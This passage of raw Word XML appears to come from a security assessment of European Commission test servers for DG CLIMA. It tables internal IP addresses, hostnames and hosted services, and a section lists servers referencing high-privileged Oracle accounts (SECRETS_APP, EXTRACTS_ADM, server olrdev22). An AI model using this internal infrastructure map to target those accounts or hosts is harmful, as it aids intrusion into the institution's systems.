              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>CH-TI.CHL-VALIDATION</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00221B72" w:rsidRPr="001019D3" w14:paraId="530BF8AF" w14:textId="2124A204" w:rsidTr="00221B72">
        <w:trPr>
          <w:trHeight w:val="227"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="00E0A129" w14:textId="3962EBB1"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10.130.136.170</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1314" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7629E4B9" w14:textId="3B53BF0E"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wlstd11321.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="496" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="0A720977" w14:textId="16D53EA0"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1743D084" w14:textId="0DD03EFE"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1568431B" w14:textId="090D58F7" w:rsidR="00710241" w:rsidRPr="001019D3" w:rsidRDefault="00710241" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>CH-TI.CHL-VALIDATION</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00221B72" w:rsidRPr="001019D3" w14:paraId="6E75DBC4" w14:textId="5BE31981" w:rsidTr="00221B72">
        <w:trPr>
          <w:trHeight w:val="227"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="61FA1DCC" w14:textId="23C99E29"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10.130.139.102</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1314" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5802EEA7" w14:textId="124CD04F"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wlstd11318.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="496" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="1A43F76B" w14:textId="27E0112F"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4E112016" w14:textId="5A00118A"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32565AA2" w14:textId="4FADB053" w:rsidR="00710241" w:rsidRPr="001019D3" w:rsidRDefault="00710241" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>CH-TI.CHL-VALIDATION</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00221B72" w:rsidRPr="001019D3" w14:paraId="7D9AEB30" w14:textId="35DFBA7D" w:rsidTr="00221B72">
        <w:trPr>
          <w:trHeight w:val="227"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="261583C2" w14:textId="4316C832"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10.130.129.141</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1314" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="627D2403" w14:textId="2D5C746A"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wlstd11267.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="496" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="4F4CB5F1" w14:textId="4EEADF99"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28DEC86B" w14:textId="2390C94D"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63022BBE" w14:textId="048744DA" w:rsidR="00710241" w:rsidRPr="001019D3" w:rsidRDefault="00710241" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>CH-TI</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00221B72" w:rsidRPr="001019D3" w14:paraId="624E702D" w14:textId="65550C29" w:rsidTr="00221B72">
        <w:trPr>
          <w:trHeight w:val="227"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="357E288D" w14:textId="6F74B2F8" w:rsidR="00710241" w:rsidRPr="001019D3" w:rsidRDefault="00710241" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.143.107</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1314" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4369FAC2" w14:textId="628C67E9" w:rsidR="00710241" w:rsidRPr="001019D3" w:rsidRDefault="00710241" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd11265.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="496" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="3136BCD2" w14:textId="3F7B4FDA" w:rsidR="00710241" w:rsidRPr="001019D3" w:rsidRDefault="00710241" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>CLIMA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="818" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="0535C2C6" w14:textId="78B341D9" w:rsidR="00710241" w:rsidRPr="001019D3" w:rsidRDefault="00710241" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>Test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1496" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="0AC06F91" w14:textId="0FF21201" w:rsidR="00710241" w:rsidRPr="001019D3" w:rsidRDefault="00710241" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>CH-TI</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="796C8409" w14:textId="77777777" w:rsidR="00F5296D" w:rsidRPr="001019D3" w:rsidRDefault="00F5296D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="257" w:name="_Ref212830031"/>
      <w:r w:rsidRPr="001019D3">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="600DC90F" w14:textId="51DEE9D3" w:rsidR="0055647E" w:rsidRPr="001019D3" w:rsidRDefault="00F5296D" w:rsidP="00F5296D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="258" w:name="_Ref213089470"/>
      <w:bookmarkStart w:id="259" w:name="_Toc213253588"/>
      <w:bookmarkEnd w:id="251"/>
      <w:bookmarkEnd w:id="252"/>
      <w:bookmarkEnd w:id="257"/>
      <w:r w:rsidRPr="001019D3">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Servers </w:t>
      </w:r>
      <w:r w:rsidR="0034018F" w:rsidRPr="001019D3">
        <w:t>that reference</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> high-privileged Oracle DB users</w:t>
      </w:r>
      <w:bookmarkEnd w:id="258"/>
      <w:bookmarkEnd w:id="259"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1337"/>
        <w:gridCol w:w="1921"/>
        <w:gridCol w:w="714"/>
        <w:gridCol w:w="1384"/>
        <w:gridCol w:w="1503"/>
        <w:gridCol w:w="1887"/>
      </w:tblGrid>
      <w:tr w:rsidR="0034018F" w:rsidRPr="001019D3" w14:paraId="55AABD4E" w14:textId="7E11D473" w:rsidTr="004C0F72">
        <w:trPr>
          <w:trHeight w:val="340"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="764" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="22439B94" w14:textId="77777777" w:rsidR="0034018F" w:rsidRPr="001019D3" w:rsidRDefault="0034018F" w:rsidP="0034018F">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1098" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16B43ABC" w14:textId="77777777" w:rsidR="0034018F" w:rsidRPr="001019D3" w:rsidRDefault="0034018F" w:rsidP="0034018F">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>FQDN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="408" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1B3DFA18" w14:textId="77777777" w:rsidR="0034018F" w:rsidRPr="001019D3" w:rsidRDefault="0034018F" w:rsidP="0034018F">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>DG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="791" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="33B01C3F" w14:textId="77777777" w:rsidR="0034018F" w:rsidRPr="001019D3" w:rsidRDefault="0034018F" w:rsidP="0034018F">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>Environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="859" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06387934" w14:textId="77777777" w:rsidR="0034018F" w:rsidRPr="001019D3" w:rsidRDefault="0034018F" w:rsidP="0034018F">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>Hosted Services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1079" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D103232" w14:textId="36708088" w:rsidR="0034018F" w:rsidRPr="001019D3" w:rsidRDefault="0034018F" w:rsidP="0034018F">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>Connection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0034018F" w:rsidRPr="001019D3" w14:paraId="70542920" w14:textId="416269BA" w:rsidTr="004C0F72">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="764" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="122D33ED" w14:textId="6502331C" w:rsidR="0034018F" w:rsidRPr="001019D3" w:rsidRDefault="0034018F" w:rsidP="0034018F">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>10.130.180.159</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1098" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B2DD5B9" w14:textId="78A04F9F" w:rsidR="0034018F" w:rsidRPr="001019D3" w:rsidRDefault="0034018F" w:rsidP="0034018F">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>wlstd03803.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="408" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="586D171D" w14:textId="704C2118" w:rsidR="0034018F" w:rsidRPr="001019D3" w:rsidRDefault="0034018F" w:rsidP="0034018F">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>CLIMA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="791" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6C1C8594" w14:textId="61F39E35" w:rsidR="0034018F" w:rsidRPr="001019D3" w:rsidRDefault="0034018F" w:rsidP="0034018F">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="859" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D3D7B00" w14:textId="2F3CC56A" w:rsidR="0034018F" w:rsidRPr="001019D3" w:rsidRDefault="0034018F" w:rsidP="0034018F">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>EUTL PUBLIC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1079" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2F2ABFD6" w14:textId="2BB0E5FC" w:rsidR="0034018F" w:rsidRPr="001019D3" w:rsidRDefault="0034018F" w:rsidP="00F5296D">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">User: </w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SECRETS_APP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="777EDBEF" w14:textId="545E7BB1" w:rsidR="0034018F" w:rsidRPr="001019D3" w:rsidRDefault="0034018F" w:rsidP="00F5296D">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Oracle DB server: </w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>olrdev22</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0034018F" w:rsidRPr="001019D3" w14:paraId="5A15B6F7" w14:textId="58C85815" w:rsidTr="004C0F72">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="764" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="67BAAF7A" w14:textId="15BBA0C7" w:rsidR="0034018F" w:rsidRPr="001019D3" w:rsidRDefault="0034018F" w:rsidP="0034018F">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.140.150</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1098" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FEAC916" w14:textId="41DEE4CE" w:rsidR="0034018F" w:rsidRPr="001019D3" w:rsidRDefault="0034018F" w:rsidP="0034018F">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd04188.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="408" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D31552A" w14:textId="571E3801" w:rsidR="0034018F" w:rsidRPr="001019D3" w:rsidRDefault="0034018F" w:rsidP="0034018F">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>CLIMA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="791" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="189D15FC" w14:textId="5DA2B4BF" w:rsidR="0034018F" w:rsidRPr="001019D3" w:rsidRDefault="0034018F" w:rsidP="0034018F">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>Test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="859" w:type="pct"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D612369" w14:textId="13FBA680" w:rsidR="0034018F" w:rsidRPr="001019D3" w:rsidRDefault="0034018F" w:rsidP="0034018F">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>URA.EXTRACTS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1079" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0D4BA27A" w14:textId="2AC7D59F" w:rsidR="0034018F" w:rsidRPr="001019D3" w:rsidRDefault="0034018F" w:rsidP="0034018F">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">User: </w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>EXTRACTS_ADM</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18E80C00" w14:textId="56603784" w:rsidR="0034018F" w:rsidRPr="001019D3" w:rsidRDefault="0034018F" w:rsidP="0034018F">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
